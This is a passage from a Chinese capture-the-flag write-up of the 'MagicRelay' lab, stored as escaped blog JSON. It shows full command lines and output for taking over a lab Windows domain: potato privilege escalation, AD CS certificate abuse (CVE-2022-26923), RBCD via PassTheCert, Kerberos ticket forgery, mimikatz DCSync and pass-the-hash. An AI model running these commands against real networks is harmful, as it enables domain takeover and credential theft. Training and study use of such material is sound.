C:\/Users\/Public\/sweetpotato.exe -a "whoami"<\/code><\/pre>\n![\"magicrelay_11\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_11.png\")
<\/p>\n
\u53d1\u73b0\u6709\u57df\u73af\u5883<\/p>\n
![\"magicrelay_12\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_12.png\")
<\/p>\n
\u8fd9\u91cc\u76f4\u63a5\u751c\u571f\u8c46\u53bb\u6267\u884csharphound\u6536\u96c6\u547d\u4ee4\u6ca1\u6210\u529f\uff0c\u5148system\u8eab\u4efd\u4e0a\u7ebf\u4e4b\u540e\u518d\u53bb\u6536\u96c6<\/p>\n
![\"magicrelay_13\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_13.png\")
<\/p>\n
\u62d3\u6251\u56fe\u53ea\u770b\u5230DC\u8fd9\u53f0\u673a\u5668\uff0c\u800c\u4e14\u4e5f\u6ca1\u5565\u4e1c\u897f<\/p>\n
![\"magicrelay_14\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_14.png\")
<\/p>\n
cs\u4ee5system\u6743\u9650\u4e0a\u7ebf\uff0c\u80fd\u6293\u5230WIN-YUYAOX9Q$<\/code>\u673a\u5668\u7528\u6237\u7684NTLM<\/p>\n![\"magicrelay_15\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_15.png\")
<\/p>\n
* Username : WIN-YUYAOX9Q$\n* Domain : XIAORANG\n* NTLM : e611213c6a712f9b18a8d056005a4f0f\n* SHA1 : 1a8d2c95320592037c0fa583c1f62212d4ff8ce9<\/code><\/pre>\n\u56e0\u4e3a\u626b\u5230\u4e86AD CS\uff0ccertify\u6536\u96c6\u4e00\u4e0b\u4fe1\u606f\uff08\u7528system\u6743\u9650\uff09<\/p>\n
![\"magicrelay_16\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_16.png\")
<\/p>\n
[*] Action: Find certificate templates\n[*] Using the search base 'CN=Configuration,DC=xiaorang,DC=lab'\n\n[*] Listing info about the Enterprise CA 'xiaorang-WIN-AUTHORITY-CA'\n\n Enterprise CA Name : xiaorang-WIN-AUTHORITY-CA\n DNS Hostname : WIN-AUTHORITY.xiaorang.lab\n FullName : WIN-AUTHORITY.xiaorang.lab\\xiaorang-WIN-AUTHORITY-CA\n Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED\n Cert SubjectName : CN=xiaorang-WIN-AUTHORITY-CA, DC=xiaorang, DC=lab\n Cert Thumbprint : 10944A7D8B6C6CBC7EE267DD6DBF3C0624FE7F08\n Cert Serial : 2E92B9E129A646B84641219EFBDB1EB3\n Cert Start Date : 2022\/10\/29 10:50:19\n Cert End Date : 2027\/10\/29 11:00:19\n Cert Chain : CN=xiaorang-WIN-AUTHORITY-CA,DC=xiaorang,DC=lab\n UserSpecifiedSAN : Disabled\n CA Permissions :\n Owner: BUILTIN\\Administrators S-1-5-32-544\n\n Access Rights Principal\n\n Allow Enroll NT AUTHORITY\\Authenticated UsersS-1-5-11\n Allow ManageCA, ManageCertificates BUILTIN\\Administrators S-1-5-32-544\n Allow ManageCA, ManageCertificates XIAORANG\\Domain Admins S-1-5-21-3745972894-1678056601-2622918667-512\n Allow ManageCA, ManageCertificates XIAORANG\\Enterprise Admins S-1-5-21-3745972894-1678056601-2622918667-519\n Enrollment Agent Restrictions : None\n\n[+] No Vulnerable Certificates Templates found!<\/code><\/pre>\n\u63a5\u4e0b\u6765\u5c31\u662f\u50cf2022\u7f51\u9f0e\u676f\u90a3\u6837\u6253CVE-2022-26923\u57df\u63d0\u6743\u6f0f\u6d1e\uff0c\u5148\u914d\u4e00\u4e0bhosts<\/p>\n
172.22.12.6 WIN-SERVER.xiaorang.lab\n172.22.12.12 WIN-AUTHORITY.xiaorang.lab<\/code><\/pre>\n\u73b0\u5728\u8fd8\u9700\u8981\u4e00\u4e2a\u77e5\u9053\u8d26\u5bc6\u7684\u673a\u5668\u7528\u6237\uff0c\u5229\u7528\u524d\u9762WIN-YUYAOX9Q$<\/code>\u673a\u5668\u7528\u6237\u521b\u5efa\u4e00\u4e2a\u65b0\u7684\u673a\u5668\u7528\u6237<\/p>\nproxychains4 certipy account create -u WIN-YUYAOX9Q$ -hashes e611213c6a712f9b18a8d056005a4f0f -dc-ip 172.22.12.6 -user simho -dns WIN-SERVER.xiaorang.lab -debug<\/code><\/pre>\n![\"magicrelay_17\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_17.png\")
<\/p>\n
simho$\/YNj8hDLLR82VNLZq<\/code><\/pre>\n\u63a5\u7740\u5229\u7528\u8be5\u673a\u5668\u7528\u6237\u4ee5\u53ca\u524d\u9762certify\u6536\u96c6\u7684CA name<\/code>\u83b7\u53d6pfx\u51ed\u8bc1<\/p>\n\u5229\u7528\u8bc1\u4e66\u83b7\u53d6\u57df\u63a7hash\u65f6\uff0c\u8ddfCertify\u90a3\u4e2a\u9776\u573a\u62a5\u4e00\u6837\u7684\u9519<\/p>\n
proxychains4 certipy req -u 'simho$@xiaorang.lab' -p 'YNj8hDLLR82VNLZq' -ca 'xiaorang-WIN-AUTHORITY-CA' -target 172.22.12.12 -template 'Machine' -debug -dc-ip 172.22.12.6\n\nproxychains4 certipy auth -pfx win-server.pfx -dc-ip 172.22.12.6 -debug<\/code><\/pre>\n![\"magicrelay_18\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_18.png\")
<\/p>\n
![\"magicrelay_19\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_19.png\")
<\/p>\n
\u6309\u7167Schannel<\/code>\u6b65\u9aa4\u6765\uff0c\u4ece.pfx\u5206\u522b\u5bfc\u51fa.key\u6587\u4ef6\u548c.crt\u6587\u4ef6\uff0c\u5e76\u5c06\u5bc6\u7801\u7f6e\u7a7a<\/p>\nopenssl pkcs12 -in win-server.pfx -nodes -out win-server.pem\nopenssl rsa -in win-server.pem -out win-server.key\nopenssl x509 -in win-server.pem -out win-server.crt\nproxychains4 certipy cert -pfx win-server.pfx -nokey -out win-server.crt\nproxychains4 certipy cert -pfx win-server.pfx -nocert -out win-server.key <\/code><\/pre>\n\u63a5\u4e0b\u6765\u7528passthecert<\/code>\u6253RBCD\u653b\u51fb<\/p>\n![\"magicrelay_20\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_20.png\")
<\/p>\n
\u5c06\u8bc1\u4e66\u4f20\u9012\u5230 LDAP\uff0c\u4fee\u6539 LDAP \u914d\u7f6e\u4ece\u800c\u83b7\u5f97\u57df\u63a7\u6743\u9650<\/p>\n
proxychains4 python3 passthecert.py -action whoami -crt win-server.crt -key win-server.key -domain xiaorang.lab -dc-ip 172.22.12.6<\/code><\/pre>\n\u5c06\u8bc1\u4e66\u914d\u7f6e\u5230\u57df\u63a7\u7684RBCD<\/code><\/p>\nproxychains4 python3 passthecert.py -action write_rbcd -crt win-server.crt -key win-server.key -domain xiaorang.lab -dc-ip 172.22.12.6 -delegate-to 'win-server$' -delegate-from 'simho$'<\/code><\/pre>\n![\"magicrelay_21\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_21.png\")
<\/p>\n
\u7533\u8bf7CIFS\u670d\u52a1\u7968\u636e<\/p>\n
proxychains4 impacket-getST xiaorang.lab\/'simho$':'YNj8hDLLR82VNLZq' -spn cifs\/WIN-SERVER.xiaorang.lab -impersonate Administrator -dc-ip 172.22.12.6<\/code><\/pre>\n\u5bfc\u5165\u7968\u636e<\/p>\n
export KRB5CCNAME=Administrator.ccache<\/code><\/pre>\n![\"magicrelay_22\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_22.png\")
<\/p>\n
\u5bfc\u5165\u540e\u5373\u53ef\u65e0\u5bc6\u7801\u767b\u5f55<\/p>\n
proxychains4 impacket-psexec Administrator@WIN-SERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.12.6<\/code><\/pre>\n\u62ff\u5230\u57df\u63a7flag<\/p>\n
![\"magicrelay_23\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_23.png\")
<\/p>\n
flag{4c7d6e81-3161-4853-b93f-349ab74a60e5}<\/code><\/pre>\nflag3<\/h3>\n
\u5728\u57df\u63a7\u90a3\u53f0\u673a\u5668\u6dfb\u52a0\u7ba1\u7406\u5458\u8d26\u53f7\uff0crdp\u8fde\u63a5\u4e0a\u53bb\u540e\uff0c\u5c06mimikatz.exe\u653e\u5230System32\u6587\u4ef6\u5939\u4e0b\uff0c\u7136\u540e\u4ee5system\u6743\u9650\u5bfc\u54c8\u5e0c<\/p>\n
mimikatz.exe "lsadump::dcsync \/domain:xiaorang.lab \/all \/csv" "exit"<\/code><\/pre>\n![\"magicrelay_24\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_24.png\")
<\/p>\n
\u6216\u8005\u5b66c1trus<\/code>\u5e08\u5085\u7528SAM\u8f6c\u50a8<\/p>\nproxychains4 impacket-secretsdump 'xiaorang.lab\/administrator@win-server.xiaorang.lab' -target-ip 172.22.12.6 -no-pass -k<\/code><\/pre>\n......\n[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)\n[*] Using the DRSUAPI method to get NTDS.DIT secrets\n[proxychains] Strict chain ... 39.98.117.52:10086 ... 172.22.12.6:135 ... OK\n[proxychains] Strict chain ... 39.98.117.52:10086 ... 172.22.12.6:49667 ... OK\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:aa95e708a5182931157a526acf769b13:::\n......<\/code><\/pre>\n\u63a5\u7740PTH\u5230172.22.12.12<\/code>\u673a\u5668\u62ff\u6700\u540e\u4e00\u4e2aflag<\/p>\nproxychains4 impacket-smbexec -hashes :aa95e708a5182931157a526acf769b13 xiaorang.lab\/administrator@172.22.12.12 -codec gbk\n\ntype C:\\Users\\Administrator\\flag03.txt<\/code><\/pre>\n![\"magicrelay_25\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_25.png\")
<\/p>\n
flag{317621a6-bb66-4154-b157-365c871d52d2}<\/code><\/pre>\n<\/div>","protected":false},"excerpt":{"rendered":"
MagicRelay \u6d89\u53ca\u7684\u77e5\u8bc6\u70b9 redis dll\u52ab\u6301\u4e0a\u7ebfcs\u9a6c \u5411\u65e5\u8475 RCE SeImpersonat […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-808","post","type-post","status-publish","format-standard","hentry","category-pentesting"],"views":635,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/808","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=808"}],"version-history":[{"count":3,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/808\/revisions"}],"predecessor-version":[{"id":836,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/808\/revisions\/836"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=808"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=808"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=808"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"magicrelay_1\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_1.png\")
<\/p>\n![\"magicrelay_2\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_2.png\")
<\/p>\n![\"magicrelay_3\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_3.png\")
<\/p>\n![\"magicrelay_4\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_4.png\")
<\/p>\n![\"magicrelay_5\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_5.png\")
<\/p>\n![\"magicrelay_6\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_6.png\")
<\/p>\n![\"magicrelay_7\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_7.png\")
<\/p>\n![\"magicrelay_8\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_8.png\")
<\/p>\n![\"magicrelay_9\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_9.png\")
<\/p>\n![\"magicrelay_10\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_10.png\")
<\/p>\n